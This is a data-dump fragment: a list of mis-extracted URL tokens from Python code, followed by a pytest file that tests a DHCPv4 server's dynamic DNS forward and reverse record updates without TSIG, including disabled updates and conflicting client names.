['URL', 'Quality.SD'], ['URL', 'Quality.SD'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.ar'], ['URL', 'self.ar'], ['URL', 'Quality.com'], ['URL', 'obj.na'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'Quality.DO'], ['URL', 'Quality.AR'], ['URL', 'Quality.NO'], ['URL', 'Quality.SN'], ['URL', 'Quality.SN'], ['URL', 'Quality.NO'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'Quality.DO'], ['URL', 'Quality.AR'], ['URL', 'Quality.SN'], ['URL', 'Quality.SN'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'sickbeard.showQueueScheduler.ac'], ['URL', 'obj.na'], ['URL', 'logger.DE'], ['URL', 'obj.na'], ['URL', 'self.so'], ['URL', 'self.ch'], ['URL', 'self.pa'], ['URL', 'self.ch'], ['URL', 'sickbeard.sh'], ['URL', 'self.pa'], ['URL', 'curShow.pa'], ['URL', 'helpers.ma'], ['URL', 'curShow.pa'], ['URL', 'curShow.la'], ['URL', 'curShow.ai'], ['URL', 'curShow.an'], ['URL', 'curShow.in'], ['URL', 'curShow.net'], ['URL', 'curShow.na'], ['URL', 'curShow.st'], ['URL', 'curShow.su'], ['URL', 'helpers.tr'], ['URL', 'curShow.ne'], ['URL', 'sbdatetime.sbdatetime.co'], ['URL', 'timezones.pa'], ['URL', 'curShow.ne'], ['URL', 'curShow.ai'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'curShow.in'], ['URL', 'self.so'], ['URL', 'curShow.na'], ['URL', 'curShow.in'], ['URL', 'episode.se'], ['URL', 'episode.se'], ['URL', 'episode.su'], ['URL', 'history.cl'], ['URL', 'history.tr'], ['URL', 'sb.ad'], ['URL', 'sb.ch'], ['URL', 'sb.ch'], ['URL', 'sb.de'], ['URL', 'sb.ge'], ['URL', 'sb.ge'], ['URL', 'sb.ge'], ['URL', 'sb.pa'], ['URL', 'sb.re'], ['URL', 'sb.se'], ['URL', 'sb.se'], ['URL', 'sb.se'], ['URL', 'sb.se'], ['URL', 'sb.sh'], ['URL', 'show.ad'], ['URL', 'show.ad'], ['URL', 'show.ca'], ['URL', 'show.de'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.pa'], ['URL', 'show.re'], ['URL', 'show.se'], ['URL', 'show.se'], ['URL', 'show.se'], ['URL', 'show.st'], ['URL', 'shows.st']]" +12,"""""""DDNS without TSIG"""""" + +# pylint: disable=invalid-name,line-too-long + +import pytest + +import misc +import srv_control +import srv_msg + + +@pytest.mark.v4 +@pytest.mark.ddns +@pytest.mark.notsig +@pytest.mark.forward_reverse_add +def test_ddns4_notsig_forw_and_rev_add_success_Sflag(): + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('enable-updates', True) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + srv_control.use_dns_set_number(20) + srv_control.start_srv('DNS', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.client_requests_option(1) + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.') + srv_msg.client_sets_value('Client', 'FQDN_flags', 'S') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 1) + srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.') + srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.') + + +@pytest.mark.v4 +@pytest.mark.ddns +@pytest.mark.notsig +@pytest.mark.forward_reverse_add +def test_ddns4_notsig_forw_and_rev_add_fail_Sflag(): + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('enable-updates', True) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + srv_control.use_dns_set_number(20) + srv_control.start_srv('DNS', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.client_requests_option(1) + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.exae.com.') + srv_msg.client_sets_value('Client', 'FQDN_flags', 'S') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 1) + srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.exae.com.') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + +@pytest.mark.v4 +@pytest.mark.ddns +@pytest.mark.notsig +@pytest.mark.forward_reverse_add +def test_ddns4_notsig_forw_and_rev_notenabled_Sflag(): + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('enable-updates', False) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + srv_control.use_dns_set_number(20) + srv_control.start_srv('DNS', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.client_requests_option(1) + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.') + srv_msg.client_sets_value('Client', 'FQDN_flags', 'S') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + # Response option 81 MUST contain flags 10. #later make it 's' 'n' and 'o' should be 10 + srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + +@pytest.mark.v4 +@pytest.mark.ddns +@pytest.mark.notsig +@pytest.mark.forward_update +def test_ddns4_notsig_forw_and_rev_update_success_Sflag(): + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('enable-updates', True) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + srv_control.use_dns_set_number(20) + srv_control.start_srv('DNS', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.client_requests_option(1) + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.') + srv_msg.client_sets_value('Client', 'FQDN_flags', 'S') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 1) + srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.') + srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.') + + misc.test_setup() + srv_control.start_srv('DHCP', 'stopped') + srv_control.clear_some_data('leases') + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('enable-updates', True) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.') + srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.') + + misc.test_procedure() + srv_msg.client_requests_option(1) + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.') + srv_msg.client_sets_value('Client', 'FQDN_flags', 'S') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 1) + srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.') + srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.') + + +@pytest.mark.v4 +@pytest.mark.ddns +@pytest.mark.notsig +@pytest.mark.forward_reverse_add +def test_ddns4_notsig_forw_and_rev_two_dhci_Sflag(): + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('enable-updates', True) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + srv_control.use_dns_set_number(20) + srv_control.start_srv('DNS', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('client1.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.dns_question_record('client2.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:11') + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:11') + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'client1.four.example.com.') + srv_msg.client_sets_value('Client', 'FQDN_flags', 'S') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 1) + srv_msg.response_check_option_content(81, 'fqdn', 'client1.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('client1.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'client1.four.example.com.') + + # Client 2 add + misc.test_procedure() + srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12') + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12') + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'client2.four.example.com.') + srv_msg.client_sets_value('Client', 'FQDN_flags', 'S') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 1) + srv_msg.response_check_option_content(81, 'fqdn', 'client2.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('client2.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'client2.four.example.com.') + + +@pytest.mark.v4 +@pytest.mark.ddns +@pytest.mark.notsig +@pytest.mark.forward_reverse_add +def test_ddns4_notsig_forw_and_rev_dhci_conflicts_Sflag(): + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('enable-updates', True) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + srv_control.use_dns_set_number(20) + srv_control.start_srv('DNS', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('client1.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.dns_question_record('client2.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:11') + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:11') + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'client1.four.example.com.') + srv_msg.client_sets_value('Client', 'FQDN_flags', 'S') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 1) + srv_msg.response_check_option_content(81, 'fqdn', 'client1.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('client1.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'client1.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', 'client1.four.example.com.') + srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.') + + # Client 2 add + misc.test_procedure() + srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12') + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12') + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'client2.four.example.com.') + srv_msg.client_sets_value('Client', 'FQDN_flags', 'S') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 1) + srv_msg.response_check_option_content(81, 'fqdn', 'client2.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('client2.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'client2.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', 'client2.four.example.com.') + srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.') + + # Client 2 try to update client's 1 domain + misc.test_procedure() + srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12') + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12') + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'client1.four.example.com.') + srv_msg.client_sets_value('Client', 'FQDN_flags', 'S') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 1) + srv_msg.response_check_option_content(81, 'fqdn', 'client1.four.example.com.') + + # address and domain name should not be changed! + misc.test_procedure() + srv_msg.dns_question_record('client1.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'client1.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', 'client1.four.example.com.') + srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.') + + misc.test_procedure() + srv_msg.dns_question_record('client2.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + +@pytest.mark.v4 +@pytest.mark.ddns +@pytest.mark.notsig +@pytest.mark.forward_reverse_add +def 